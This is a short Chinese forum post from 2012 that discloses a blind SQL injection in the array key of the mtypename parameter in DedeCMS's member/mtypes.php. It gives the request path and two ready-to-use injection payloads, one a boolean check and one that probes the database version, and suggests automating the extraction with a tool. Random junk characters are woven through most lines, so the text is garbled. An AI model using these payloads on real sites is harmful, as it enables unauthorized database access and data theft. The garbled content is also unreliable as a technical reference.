需要magic_quotes_gpc = Off,所以说是鸡肋啊.# {& G$ ]# g! M1 E a
# ]) F9 |6 o4 C/ i 2 M, V: l3 h0 T8 Y5 n
发生在数组key里的注射漏洞,有点意思.3 N% z6 t# M$ Q$ ]
- ?% c8 b* y' z2 B3 K- \9 J: e
这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下% l$ `9 ~% k4 p9 \+ d' o+ Z% V
+ y7 \- l! v/ [% Bhttp://www.xxx.com /dede/member/mtypes.php?dopost=save; k, h( q4 ^6 F+ K
( U k3 U! z# z8 v6 s% Y ^0 B
exploit:6 M9 R; f% { i6 V; r
mtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r, N, R- g4 J$ B }% E& j
mtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r8 w( G3 H$ c0 C5 Z$ j
|
发表于 2012-12-20 08:08:09
收藏
支持
反对